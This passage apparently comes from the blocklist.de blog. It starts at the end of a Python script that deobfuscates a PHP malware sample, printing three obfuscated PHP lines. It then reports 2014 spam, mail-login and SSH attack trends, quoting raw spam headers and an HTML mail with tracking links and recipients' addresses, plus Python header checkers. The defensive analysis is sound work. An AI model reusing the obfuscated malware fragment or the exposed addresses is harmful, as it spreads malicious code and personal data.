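if (!$GLOBALS['fjiib51']($s38[56].$s38[50].$s38[89].$s38[60].$s38[60].$s38[48].$s38[89].$s38[37].$s38[89].$s38[90]))
if ($ntgai94 !== $s38[20].$s38[3].$s38[1].$s38[73].$s38[37])
return $s38[24].$s38[25].$s38[7].$s38[71].$s38[24].$nqwrs0;
"""

if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
```

The same two passes work for the other samples of this family: only KEY (the first assignment in the payload) and the variable name in RUN/ASSIGN change from sample to sample. Aliases that the truncated part of the listing hides (the curl_* and f* wrappers in the helper functions) stay as they are, since the script never guesses a name it cannot decode.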

For more information and updates, you can follow MalwareMustDie on Twitter:
https://twitter.com/MalwareMustDie


So, please update and secure all your sites and scripts!

If you have questions, please contact us :-)

2014
03.20

Today, we received a lot of spam mails like:

Presente para voce, consumidor: ate 60% off em pecas selecionadas
Você Merece o Melhor
Atencao, anapaula@pacaluz.com.br  Casas Bahia Informa como aprovado seu pedido n. 18977
Este vendedor ainda trabalha com você?

and others at our postmaster address. Today it was over 1,650 mails.
We have reported them via spamcop.net to the abuse departments of the sources and to the abuse departments responsible for the links in the mail bodies.
Most of the spam mails carry only @localhost.localdomain in the Message-ID and use return-path addresses like "bounce-xxx", "return-xxx" and similar:
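To make the signs listed above checkable, here is an added Python example (not part of the original post) that reads a raw message and reports four indicators: a Message-ID at localhost.localdomain, a bounce-/return- style return-path, "Received-SPF: none" and "dkim=permerror" in Authentication-Results; it also decodes RFC 2047 subjects like the second one in the list. The two samples are trimmed from the headers of the mails quoted below (bodies and most Received lines dropped), so they are constructed inputs rather than complete messages.

```python
import re
import email
from email import policy
from email.utils import parseaddr


def _domain(addr):
    return addr.rsplit("@", 1)[1].lower() if "@" in addr else ""


def indicators(raw):
    """The four signs discussed above, read from one raw RFC 5322 message."""
    msg = email.message_from_string(raw, policy=policy.default)
    return_path = parseaddr(str(msg.get("Return-Path", "")))[1]
    local = return_path.split("@", 1)[0].lower()
    msgid = str(msg.get("Message-ID", "")).strip().strip("<>")
    return {
        # Message-ID generated on a host whose hostname was never set
        "msgid_localhost": _domain(msgid) == "localhost.localdomain",
        # bulk-mailer style bounce/return addresses as envelope sender
        "bulk_return_path": re.match(r"(bounce|return)(-|$)", local) is not None,
        # the sending domain publishes no SPF policy at all
        "spf_none": str(msg.get("Received-SPF", "")).strip().lower().startswith("none"),
        # DKIM signature present but unverifiable (empty or unusable key record)
        "dkim_permerror": "dkim=permerror" in str(msg.get("Authentication-Results", "")),
    }


def score(raw):
    """Number of indicators that fired; useful as an extra SpamAssassin-style signal."""
    return sum(indicators(raw).values())


def decoded_subject(raw):
    """RFC 2047 subjects (=?UTF-8?B?...?=) decoded to text."""
    return str(email.message_from_string(raw, policy=policy.default).get("Subject", ""))


# Constructed samples: headers trimmed from the two mails quoted below.
SAMPLE_1 = "\n".join([
    "Return-Path: <return@baratomail4.com.br>",
    "Authentication-Results: mail.blocklist.de; dkim=permerror",
    "\t(verification error: empty key record; insecure key)",
    "\theader.i=abuse@baratomail4.com.br; dkim-adsp=none (insecure policy)",
    'Received-SPF: none (baratomail4.com.br: No applicable sender policy available) receiver=webserver2.blocklist.de; identity=mailfrom; envelope-from="return@baratomail4.com.br"; helo=grupotreviso.com.br; client-ip=200.216.198.85',
    "Message-ID: <b3164728023c9761cb7ff3db18d1a3be@baratomail4.com.br>",
    'From: "Sabor e Estilo" <send@baratomail4.com.br>',
    "Subject: =?UTF-8?B?Vm9jw6ogTWVyZWNlIG8gTWVsaG9y?=",
    "",
    "(body omitted)",
])

SAMPLE_2 = "\n".join([
    "Return-Path: <bounce-2696-19326188-4124-248@hiperlux.com.br>",
    'Received-SPF: none (hiperlux.com.br: No applicable sender policy available) receiver=smtp-mx.blocklist.de; identity=mailfrom; envelope-from="bounce-2696-19326188-4124-248@hiperlux.com.br"; helo=irmadulce.org.br; client-ip=186.215.253.93',
    "Message-ID: <ee5e6dfa82664ef97b3debab3faf58ca@localhost.localdomain>",
    "From: Triton - Roupas e Acessorios <Triton@hiperlux.com.br>",
    "Subject: Presente para voce, consumidor: ate 60% off em pecas selecionadas",
    "",
    "(body omitted)",
])

if __name__ == "__main__":
    for raw in (SAMPLE_1, SAMPLE_2):
        print(decoded_subject(raw), indicators(raw), score(raw))
```

Feed it a full message from the spool (`indicators(open(path).read())`); with all Received lines present the `Received-SPF` and `Authentication-Results` headers your own MTA added are the ones that count, so check only the copies written by the host you trust.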

Return-Path: <return@baratomail4.com.br>
Delivered-To: root@blocklist.de
Received: by mail.blocklist.de (Postfix, from userid 1001)
	id 80DDE2F1B70; Thu, 20 Mar 2014 06:53:39 +0100 (CET)
X-DKIM: OpenDKIM Filter v2.0.1 mail.blocklist.de 80DDE2F1B70
Authentication-Results: mail.blocklist.de; dkim=permerror
	(verification error: empty key record; insecure key)
	header.i=abuse@baratomail4.com.br; dkim-adsp=none (insecure policy)
X-Spam-Checker-Version: SpamAssassin 3.3.1 (2010-03-16) on
	server5.customer-config.de
X-Spam-Level: ****
X-Spam-ASN:  
X-Spam-Status: No, hits=4.4 required=5.5 tests=BAYES_00=-6.1,
	DATE_IN_PAST_06_12=1.543,HTML_IMAGE_RATIO_02=0.437,HTML_MESSAGE=0.001,
	MIME_HTML_ONLY=0.723,RCVD_IN_SBL=0.7,RDNS_NONE=0.793,URIBL_BLACK=1.725,
	URIBL_DBL_SPAM=1.7,URIBL_JP_SURBL=1.25,URIBL_WS_SURBL=1.608 bayes=0.0000
	relaysuntrusted=[ ip=2a01:4f8:150:74e2::4 rdns= helo=webserver2.blocklist.de
	by=mail.blocklist.de ident= envfrom= intl=0 id=3EED02F1A6A auth= msa=0 ] [
	ip=200.216.198.85 rdns=mx.grupotreviso.com.br helo=grupotreviso.com.br
	by=webserver2.blocklist.de ident= envfrom= intl=0 id=422901E400A0 auth= msa=0
	] [ ip=187.85.79.35 rdns= helo=rdns-6.baratomail4.com.br by=QA-Mail ident=
	envfrom= intl=0 id= auth= msa=0 ] autolearn=disabled scanned=[Thu, 20 Mar
	2014 06:53:39 +0100] version=3.3.1
Received: from webserver2.blocklist.de (unknown [IPv6:2a01:4f8:150:74e2::4])
	(using TLSv1 with cipher ADH-AES256-SHA (256/256 bits))
	(No client certificate requested)
	by mail.blocklist.de (Postfix) with ESMTPS id 3EED02F1A6A
	for <root@blocklist.de>; Thu, 20 Mar 2014 06:53:27 +0100 (CET)
X-DKIM: OpenDKIM Filter v2.0.1 mail.blocklist.de 3EED02F1A6A
Received: by webserver2.blocklist.de (Postfix, from userid 1000)
	id E13FF1E400A0; Thu, 20 Mar 2014 06:53:26 +0100 (CET)
X-DKIM: OpenDKIM Filter v2.0.1 webserver2.blocklist.de E13FF1E400A0
Authentication-Results: webserver2.blocklist.de; dkim=permerror
	(verification error: empty key record; insecure key)
	header.i=abuse@baratomail4.com.br; dkim-adsp=none (insecure policy)
Received-SPF: none (baratomail4.com.br: No applicable sender policy available) receiver=webserver2.blocklist.de; identity=mailfrom; envelope-from="return@baratomail4.com.br"; helo=grupotreviso.com.br; client-ip=200.216.198.85
X-DKIM: OpenDKIM Filter v2.0.1 webserver2.blocklist.de 422901E400A0
Received: from grupotreviso.com.br (mx.grupotreviso.com.br [200.216.198.85])
	by webserver2.blocklist.de (Postfix) with SMTP id 422901E400A0
	for <postmaster@blocklist.de>; Thu, 20 Mar 2014 06:53:24 +0100 (CET)
X-Qamailsafe-Spam-Score: 99
X-QamailSafe-Checksum: d599ce04b77699878cd55c7db6dd10258f298098e6d9af032a8ba934ebd2cb5f
X-QamailSafe-Source-Addr: 187.85.79.35
Received: from 187.85.79.35 (EHLO rdns-6.baratomail4.com.br)
  by QA-Mail Safe 7.0.14; Thu, 20 Mar 2014 00:38:26 -0300
DKIM-Signature: v=1; a=rsa-sha1; c=relaxed/relaxed; s=default; d=baratomail4.com.br;
 h=To:Subject:Message-ID:Date:From:Reply-To:MIME-Version:List-Unsubscribe:Content-Type:Content-Transfer-Encoding; i=abuse@baratomail4.com.br;
 bh=PL8mxp19/Mo2fJ7ycxAwI4XUbVc=;
 b=iU0HK1hDwSOSnC92NnJXgqAoNV/7UQtZMD0lsY8w5otEjd/s6cijPH7e8yy/EsviWMz6g/ligLCs
   cZIQFgUOOHJ50JmqbUq9Uc3VImqdlqF2iBnz6/LHa4e6h90ZX++YwDsxkA6d8ZaX1kaZxeS9cnb3
   tdhFtYxY5JrUk/BDG0E=
To: vas.sl@grupotreviso.com.br
Subject: =?UTF-8?B?Vm9jw6ogTWVyZWNlIG8gTWVsaG9y?=
Message-ID: <b3164728023c9761cb7ff3db18d1a3be@baratomail4.com.br>
Date: Wed, 19 Mar 2014 15:17:21 -0300
From: "Sabor e Estilo" <send@baratomail4.com.br>
Reply-To: send@baratomail4.com.br
MIME-Version: 1.0
X-Mailer-LID: 8,6,5
List-Unsubscribe: <http://baratomail4.com.br/unsubscribe.php?M=1289652&C=c3022500f5f5b55357bb0bd5b2bd14ba&L=5&N=22>
X-Mailer-RecptId: 1289652
X-Mailer-SID: 22
X-Mailer-Sent-By: 1
Content-Type: text/html; charset="UTF-8"
Content-Transfer-Encoding: 8bit

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>O Melhor Vinho do mundo</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="viewport" content="width=device-width" />
<style type="text/css">
@media only screen and (max-width:480px){
body {
	margin: 0 auto !important;
	padding: 0 auto !important;
}
table[class=omvm] { width: 300px !important; background-color:#FFFFFF
!important;}
table[class=omvm] td{ width: 300px !important; float:left !important;}
br[class=delete] {display:none !important;}
td[class=delete] {display:none !important;}
td[class=logo-omvm] img{ width: 300px !important; height: 98px !important;
float:left !important;}
td[class=accroche-omvm] img{ width: 300px !important; height: 111px
!important; float:left !important;}
td[class=visuel-omvm] img{ display:none !important;}
td[class=visuel-omvm] { width: 300px !important; height: 122px !important;
background-image:url("http://www.adleadevents.com.br/br/omelhorvinhodomundo/m_minisite_13022014/public/emkt/images/visuel-m.jpg")!important;
background-size: 300px 122px !important; background-repeat:no-repeat
!important; float:left !important;}
td[class=visuel-omvm] a{ width: 300px !important; height: 122px !important;
display:block !important;}
td[class=texte-omvm] { width: 300px !important; height: 150px !important;
float:left !important; padding-top:15px !important; text-align:center
!important;}
td[class=btn-omvm] img{ display:none !important;}
td[class=btn-omvm] { width: 300px !important; height: 80px !important;
background-image:url("http://www.adleadevents.com.br/br/omelhorvinhodomundo/m_minisite_13022014/public/emkt/images/btn-m.jpg")!important;
background-size: 300px 80px !important; background-repeat:no-repeat
!important; float:left !important;}
td[class=btn-omvm] a{ width: 300px !important; height: 80px !important;
display:block !important;}
td[class=mentions-omvm] { width: 300px !important; height: 20px !important;
float:left !important; text-align:center !important;}
}
</style>
</head>
<body bgcolor="#FFFFFF">
<center>
<table border="0" cellpadding="0" cellspacing="0"
style="width: 550px;">
<tbody>
<tr>
<td colspan="3"><a
href="http://tru.webelapp.com/adtckcm.php?idc=60171&amp;idctr=6&amp;idp=206&amp;idm=377&amp;email=vas.sl@grupotreviso.com.br&amp;rdr=http://www.adleadevents.com.br/omelhorvinhodomundo/br/m/minisite/13022014/idp=206&amp;nome=&amp;email=vas.sl@grupotreviso.com.br"
target="_blank"> <img style="display: block;"
src="http://www.adleadevents.com.br/br/omelhorvinhodomundo/m_minisite_13022014/public/emkt/images/top.jpg"
width="550" height="180" border="0" alt="O Melhor Vinho do mundo"
/></a></td>
</tr>
<tr>
<td colspan="3"><a
href="http://tru.webelapp.com/adtckcm.php?idc=60171&amp;idctr=6&amp;idp=206&amp;idm=377&amp;email=vas.sl@grupotreviso.com.br&amp;rdr=http://www.adleadevents.com.br/omelhorvinhodomundo/br/m/minisite/13022014/idp=206&amp;nome=&amp;email=vas.sl@grupotreviso.com.br"
target="_blank"> <img style="display: block;"
src="http://www.adleadevents.com.br/br/omelhorvinhodomundo/m_minisite_13022014/public/emkt/images/accroche.jpg"
width="550" height="204" border="0" alt="3 anos" /></a></td>
</tr>
<tr>
<td colspan="3"><a
href="http://tru.webelapp.com/adtckcm.php?idc=60171&amp;idctr=6&amp;idp=206&amp;idm=377&amp;email=vas.sl@grupotreviso.com.br&amp;rdr=http://www.adleadevents.com.br/omelhorvinhodomundo/br/m/minisite/13022014/idp=206&amp;nome=&amp;email=vas.sl@grupotreviso.com.br"
target="_blank"> <img style="display: block;"
src="http://www.adleadevents.com.br/br/omelhorvinhodomundo/m_minisite_13022014/public/emkt/images/top-text.jpg"
width="550" height="14" border="0" alt="O Melhor Vinho do mundo"
/></a></td>
</tr>
<tr>
<td rowspan="2"><a
href="http://tru.webelapp.com/adtckcm.php?idc=60171&amp;idctr=6&amp;idp=206&amp;idm=377&amp;email=vas.sl@grupotreviso.com.br&amp;rdr=http://www.adleadevents.com.br/omelhorvinhodomundo/br/m/minisite/13022014/idp=206&amp;nome=&amp;email=vas.sl@grupotreviso.com.br"
target="_blank"> <img style="display: block;"
src="http://www.adleadevents.com.br/br/omelhorvinhodomundo/m_minisite_13022014/public/emkt/images/left.jpg"
width="206" height="231" border="0" alt="35% Off" /></a></td>
<td width="298" height="173" style="text-align:
center;"><span style="font-family: Arial, Helvetica, sans-serif; font-size:
17px; color: #a22943;"> Saboreie um dos australianos <br /> mais
vendidos<br /> <br /> <strong style="color: #c18520; font-size: 20px;">2010
Lindeman&rsquo;s Cawarra</strong><br /> De <strike>R$45,90</strike> por
<strong style="font-size: 40px;">29,90<sup style="font-size:
14px;">1</sup></strong></span></td>
<td rowspan="2"><a
href="http://tru.webelapp.com/adtckcm.php?idc=60171&amp;idctr=6&amp;idp=206&amp;idm=377&amp;email=vas.sl@grupotreviso.com.br&amp;rdr=http://www.adleadevents.com.br/omelhorvinhodomundo/br/m/minisite/13022014/idp=206&amp;nome=&amp;email=vas.sl@grupotreviso.com.br"
target="_blank"> <img style="display: block;"
src="http://www.adleadevents.com.br/br/omelhorvinhodomundo/m_minisite_13022014/public/emkt/images/rigth.jpg"
width="46" height="231" border="0" alt="O Melhor Vinho do mundo"
/></a></td>
</tr>
<tr>
<td><a
href="http://tru.webelapp.com/adtckcm.php?idc=60171&amp;idctr=6&amp;idp=206&amp;idm=377&amp;email=vas.sl@grupotreviso.com.br&amp;rdr=http://www.adleadevents.com.br/omelhorvinhodomundo/br/m/minisite/13022014/idp=206&amp;nome=&amp;email=vas.sl@grupotreviso.com.br"
target="_blank"> <img style="display: block;"
src="http://www.adleadevents.com.br/br/omelhorvinhodomundo/m_minisite_13022014/public/emkt/images/btn.gif"
width="298" height="58" border="0" alt="Brinde conosco" /></a></td>
</tr>
<tr>
<td colspan="3"><a
href="http://tru.webelapp.com/adtckcm.php?idc=60171&amp;idctr=6&amp;idp=206&amp;idm=377&amp;email=vas.sl@grupotreviso.com.br&amp;rdr=http://www.adleadevents.com.br/omelhorvinhodomundo/br/m/minisite/13022014/idp=206&amp;nome=&amp;email=vas.sl@grupotreviso.com.br"
target="_blank"> <img style="display: block;"
src="http://www.adleadevents.com.br/br/omelhorvinhodomundo/m_minisite_13022014/public/emkt/images/bottom.jpg"
width="550" height="42" border="0" alt="O Melhor Vinho do mundo"
/></a></td>
</tr>
<tr>
<td width="550" height="29" colspan="3"
style="text-align: center;"><span style="font-family: Arial, Helvetica,
sans-serif; font-size: 10px; color: #999;"> <sup>1</sup>Na compra de quatro
garrafas </span></td>
</tr>
<tr>
<td align="center" colspan="3">
<p style="font-family: Arial, Helvetica, sans-serif; font-size: 9px; color:
#666666; font-weight: normal; margin: 15px 0 5px 0;">Conhe&ccedil;a nossa
<a
href="http://tru.webelapp.com/adtckcm.php?idc=60171&amp;idctr=6&amp;idp=206&amp;idm=377&amp;email=vas.sl@grupotreviso.com.br&amp;rdr=http://www.adleadevents.com.br/omelhorvinhodomundo/br/m/minisite/13022014/idp=206&amp;nome=&amp;email=vas.sl@grupotreviso.com.br"
target="_blank" style="text-decoration: underline; color:
#666666;">Pol&iacute;tica de Privacidade.</a></p>
<p style="font-family: Arial, Helvetica, sans-serif; font-size: 9px; color:
#666666; font-weight: normal; margin: 5px 0 5px 0;">Caso n&atilde;o queira
mais receber nossos informativos, <a
href="http://baratomail4.com.br/unsubscribe.php?M=1289652&C=c3022500f5f5b55357bb0bd5b2bd14ba&L=5&N=22"
target="_blank"><font color="#666666"><u>acesse este link</u></font></a> e
cancele sua inscri&ccedil;&atilde;o.</p>
<p style="font-family: Arial, Helvetica, sans-serif; font-size: 9px; color:
#666666; font-weight: normal; margin: 5px 0 5px 0;">2014 O Melhor Vinho do
Mundo - Todos os direitos reservados.</p>
</td>
</tr>
</tbody>
</table>
</center><img
src="http://tru.webelapp.com/adtckom.php?idc=60171&amp;idctr=6&amp;idp=206&amp;idm=377&amp;email=vas.sl@grupotreviso.com.br"
/>
<img
src="http://baratomail4.com.br/open.php?M=1289652&L=5&N=22&F=H&image=.jpg"
height="1" width="10"></body>
</html>

Another mail is:

Return-Path: <bounce-2696-19326188-4124-248@hiperlux.com.br>
Delivered-To: root@blocklist.de
Received: by mail.blocklist.de (Postfix, from userid 1001)
	id 8D69A2F1B76; Thu, 20 Mar 2014 06:52:32 +0100 (CET)
X-DKIM: OpenDKIM Filter v2.0.1 mail.blocklist.de 8D69A2F1B76
X-Spam-Checker-Version: SpamAssassin 3.3.1 (2010-03-16) on
	server5.customer-config.de
X-Spam-Level: **
X-Spam-ASN: AS18881 186.215.224.0/19
X-Spam-Status: No, hits=2.6 required=5.5 tests=AWL=-0.625,BAYES_00=-6.1,
	FUZZY_CREDIT=1.678,HTML_IMAGE_RATIO_04=0.556,HTML_MESSAGE=0.001,
	RAZOR2_CF_RANGE_51_100=0.5,RAZOR2_CF_RANGE_E8_51_100=1.886,RAZOR2_CHECK=0.922,
	RDNS_NONE=0.793,SPF_HELO_PASS=-0.001,URIBL_BLACK=1.725,URIBL_JP_SURBL=1.25
	bayes=0.0000 relaysuntrusted=[ ip=186.215.253.93 rdns= helo=irmadulce.org.br
	by=smtp-mx.blocklist.de ident= envfrom= intl=0 id=4430BD592E593 auth= msa=0 ]
	[ ip=213.252.246.27 rdns= helo=hiper27.hiperlux.com.br by=QA-Mail ident=
	envfrom= intl=0 id= auth= msa=0 ] autolearn=disabled scanned=[Thu, 20 Mar
	2014 06:52:32 +0100] version=3.3.1
Received: from smtp-mx.blocklist.de (smtp-mx.blocklist.de [93.180.154.80])
	by mail.blocklist.de (Postfix) with ESMTP id A45362F1A6A
	for <root@blocklist.de>; Thu, 20 Mar 2014 06:52:19 +0100 (CET)
X-DKIM: OpenDKIM Filter v2.0.1 mail.blocklist.de A45362F1A6A
Received-SPF: none (hiperlux.com.br: No applicable sender policy available) receiver=smtp-mx.blocklist.de; identity=mailfrom; envelope-from="bounce-2696-19326188-4124-248@hiperlux.com.br"; helo=irmadulce.org.br; client-ip=186.215.253.93
X-DKIM: OpenDKIM Filter v2.0.1 smtp-mx.blocklist.de 4430BD592E593
Received: from irmadulce.org.br (unknown [186.215.253.93])
	by smtp-mx.blocklist.de (Postfix) with SMTP id 4430BD592E593
	for <postmaster@blocklist.de>; Thu, 20 Mar 2014 06:53:51 +0100 (CET)
X-Qamailsafe-Spam-Score: 99
X-QamailSafe-Checksum: dfb0ca8c4697d217b63e40816742068736151bac7c4c252c3ec6069092015da4
X-QamailSafe-Source-Addr: 213.252.246.27
Received: from 213.252.246.27 (EHLO hiper27.hiperlux.com.br)
  by QA-Mail Safe 7.0.14; Thu, 20 Mar 2014 00:08:14 -0300
Date: Thu, 20 Mar 2014 00:06:16 -0300
To: "valdson.santos@irmadulce.org.br" <valdson.santos@irmadulce.org.br>
From: Triton - Roupas e Acessorios <Triton@hiperlux.com.br>
Reply-to: Triton - Roupas e Acessorios <Triton@hiperlux.com.br>
Subject: Presente para voce, consumidor: ate 60% off em pecas selecionadas
Message-ID: <ee5e6dfa82664ef97b3debab3faf58ca@localhost.localdomain>
X-Priority: 3
Sender: <"user-rt@info"@hiperlux.com.br>
X-Mailer: OEM
X-Complaints-To: spam-report@hiperlux.com.br
List-Unsubscribe: <http://hiperlux.com.br/media/u.php?p=s5/rs/21vc/sc/u4/rs>
X-MessageID: s5-21vc-dmFsZHNvbi5zYW50b3NAaXJtYWR1bGNlLm9yZy5icg%3D%3D-sc-rt-rs
X-Report-Abuse: <http://hiperlux.com.br/media/report_abuse.php?mid=s5-21vc-dmFsZHNvbi5zYW50b3NAaXJtYWR1bGNlLm9yZy5icg%3D%3D-sc-rt-rs>
X-SMTPAPI: {"unique_args":{"abuse-id":"s5-21vc-dmFsZHNvbi5zYW50b3NAaXJtYWR1bGNlLm9yZy5icg%3D%3D-sc-rt-rs"}, "category":"campaign"}
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="b1_ee5e6dfa82664ef97b3debab3faf58ca"


So we now reject all mails that have no SPF record and are sent to postmaster@, or that carry an X-MESSAGE-ID header.

Most mails are now rejected because they have no SPF record or a failing one, are listed at spamhaus.org, or match a header-map entry:

Mar 20 07:08:07 smtp-mx postfix/smtpd[15898]: NOQUEUE: reject: RCPT from unknown[201.73.148.20]: 550 5.7.1 <postmaster@blocklist.de>: Recipient address rejected: Please see http://www.openspf.org/Why?s=mfrom;id=dafiti%40gvgvv.com.br;ip=201.73.148.20;r=smtp-mx.blocklist.de; from=<dafiti@gvgvv.com.br> to=<postmaster@blocklist.de> proto=SMTP helo=<jmendes.com.br>

Mar 20 07:08:10 smtp-mx postfix/smtpd[15561]: NOQUEUE: reject: RCPT from unknown[201.30.165.34]: 554 5.7.1 Service unavailable; Client host [201.30.165.34] blocked using sbl-xbl.spamhaus.org; http://www.spamhaus.org/query/bl?ip=201.30.165.34; from=<bounce-30644-12669464-5960-248@bangmax.com.br> to=<postmaster@blocklist.de> proto=SMTP helo=<embrasil.com.br>

Mar 20 07:08:58 smtp-mx postfix/cleanup[15929]: 976F8D5943F85: reject: header Message-ID: <ee5e6dfa82664ef97b3debab3faf58ca@localhost.localdomain> from unknown[186.215.253.93]; from=<bounce-2696-19326188-4124-248@hiperlux.com.br> to=<postmaster@blocklist.de> proto=SMTP helo=<irmadulce.org.br>: 5.7.1 NOQUEUE: reject: This Message is not allowed here
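As an added example (not the blocklist.de setup itself), a small Python checker that applies the reject rules described above to a message's headers: no or failing SPF on mail addressed to postmaster@, and a header-map match (an X-MessageID header, or a Message-ID at localhost.localdomain as in the third log line; both patterns are my reading of the post). The sample headers are constructed placeholders modelled on the quoted mail; the spamhaus.org DNSBL check needs a live DNS lookup and is left out.

```python
import re
from email import message_from_string
from email.message import Message

# Constructed sample modelled on the quoted spam headers (placeholder values, not the original mail)
SPAM_SAMPLE = (
    "Return-Path: <bounce-1234@bulkmailer.example>\n"
    "Received-SPF: none (bulkmailer.example: No applicable sender policy available) "
    "receiver=smtp-mx.example.org; identity=mailfrom; "
    'envelope-from="bounce-1234@bulkmailer.example"; helo=victim-host.example; '
    "client-ip=192.0.2.10\n"
    "Received: from victim-host.example (unknown [192.0.2.10])\n"
    "\tby smtp-mx.example.org (Postfix) with SMTP id ABCDEF0123\n"
    "\tfor <postmaster@example.org>; Thu, 20 Mar 2014 06:53:51 +0100 (CET)\n"
    "From: Shop <shop@bulkmailer.example>\n"
    "To: <someone@victim-host.example>\n"
    "Message-ID: <0123456789abcdef@localhost.localdomain>\n"
    "X-MessageID: s5-abcd-ZXhhbXBsZQ==-sc-rt-rs\n"
    "Subject: 60% off\n"
    "\n"
    "body\n"
)

# Constructed legitimate abuse report to postmaster@ with a passing SPF check
CLEAN_SAMPLE = (
    "Received-SPF: pass (sender.example: 198.51.100.5 is authorized) "
    "receiver=smtp-mx.example.org; identity=mailfrom; "
    'envelope-from="alice@sender.example"; helo=mail.sender.example; client-ip=198.51.100.5\n'
    "Received: from mail.sender.example (mail.sender.example [198.51.100.5])\n"
    "\tby smtp-mx.example.org (Postfix) with ESMTPS id 0123ABCDEF\n"
    "\tfor <postmaster@example.org>; Thu, 20 Mar 2014 07:00:00 +0100 (CET)\n"
    "From: Alice <alice@sender.example>\n"
    "To: <postmaster@example.org>\n"
    "Message-ID: <abc@mail.sender.example>\n"
    "Subject: abuse report\n"
    "\n"
    "body\n"
)


def spf_result(msg: Message) -> str:
    """SPF verdict recorded by the MX: first word of Received-SPF, or 'none' if absent."""
    hdr = msg.get("Received-SPF")
    return hdr.split()[0].lower() if hdr else "none"


def envelope_recipient(msg: Message) -> str:
    """RCPT TO address from the MX's own Received header ('for <addr>')."""
    for received in msg.get_all("Received", []):
        m = re.search(r"\bfor\s+<([^>]+)>", received)
        if m:
            return m.group(1).lower()
    return ""


def header_map_hits(msg: Message) -> list:
    """Patterns a Postfix header_checks map could express (assumed from the post's log line)."""
    hits = []
    if msg.get("X-MessageID") is not None:
        hits.append("X-MessageID header present")
    if re.search(r"@localhost\.localdomain>?\s*$", msg.get("Message-ID", "")):
        hits.append("Message-ID from localhost.localdomain")
    return hits


def evaluate(raw_mail: str) -> tuple:
    """Apply the post's reject rules; returns ('REJECT' or 'ACCEPT', list of reasons)."""
    msg = message_from_string(raw_mail)
    reasons = []
    spf, rcpt = spf_result(msg), envelope_recipient(msg)
    if spf in ("none", "fail", "softfail") and rcpt.startswith("postmaster@"):
        reasons.append(f"SPF {spf} on mail to {rcpt}")
    reasons.extend(header_map_hits(msg))
    return ("REJECT" if reasons else "ACCEPT", reasons)


if __name__ == "__main__":
    for name, sample in (("spam", SPAM_SAMPLE), ("clean", CLEAN_SAMPLE)):
        print(name, evaluate(sample))
```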

2014
02.25

In the last blog post:

https://blog.blocklist.de/2014/01/30/ssh-attacks-increased-since-new-year/

we wrote about the increase in SSH login attacks.

Now, for about one week, the mail attacks (SASL, IMAP, POP3 and SMTP logins, as well as relaying/blocked IPs) have increased too:

Graph: mail-relay-sasl-week

The number of hacked accounts and hacked sites with spam scripts is also going up. We get lots of answers like this:

The server was hacked and an e-mail perl script was running on it. Normally there is no mail service on this server.
We are sorry about this.

 

A lot of answers come from arvixe.com, which has received reports only for „mail“. Since 20.02.2014 we have received 91 answers. From 30.05.2013 until 03.11.2013 we received only 13, and there were no „mail“ attacks, only reg-/badbots (forum spam).

At my employer, the count of hacked accounts has gone up by 3/4 compared to normal (normally 1/4).

If you are notified that your IP is on a mail blocklist like spamcop.net, or you get a blocklist.de report, please check your server for hacked e-mail accounts and running Perl bots.

2014
01.30

Since New Year, the SSH attacks have increased.
Normally each of my 6 servers sees 25-50 SSH attacks per day.

But since the first week, the attacks have gone up to a minimum of 150 SSH attacks per day:

Graph: ssh-anstieg

Other people who do not block the IPs from the SSH list (export) have seen the same increase.

On hackforums . NET, another person says he has hacked over 1.000 servers over SSH and was not disabled by server4you for attacking other servers. But if what he says is right, there are a lot of hacked servers online :-(

Please check and secure your Servers!
